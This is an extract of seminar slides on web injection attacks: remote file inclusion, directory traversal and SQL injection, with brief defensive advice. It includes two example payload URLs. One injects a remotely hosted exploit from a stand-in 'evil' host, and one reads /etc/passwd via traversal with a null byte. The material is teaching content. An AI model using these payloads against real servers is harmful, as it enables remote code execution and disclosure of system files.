Professional Documents
Culture Documents
Master Semminar Injection Exploits
Master Semminar Injection Exploits
Master Semminar Injection Exploits
Examples:
/vulnerable.php?COLOR=http://evil/exploit? - injects a remotely hosted
file containing an exploit.
/vulnerable.php?COLOR=../../../../../../../../etc/passwd%00 - allows an
attacker to read the contents of the passwd file on a UNIX system
directory traversal.
%00 is a NULL meta character which removes the .php suffix which is
added in script.
Remote file inclusion
RFI is very common exploit for different CMS
and other applications which provide plugin
systems, downloading and uploading many
files etc.
Even many commercial cms where
vulnarable for RFI
Remote file inclusion – how to
defend
Remove instructions which add files which
names are taken directly from variables –
use prepared set of possible files (choosing
with conditional instructions).
Read privilleges on server only for files
needed on website.
On some server systems (e.g. BSD-like) –
use jails for server filesystem.
SQL Injection
What's that?
Most popular injection exploit
Every application which uses SQL-based database
might be vulnerable
However, if there is no SQL – there is no danger.
Happens when user input is not properly validated
and escaped
SQL Injection - example
We want to create simple login form. User provides login and password,
and we check if such user exists in database. However, user provides
data which is control instruction for database. User gets logged in
without providing correct password.
SQL Injection – possible effects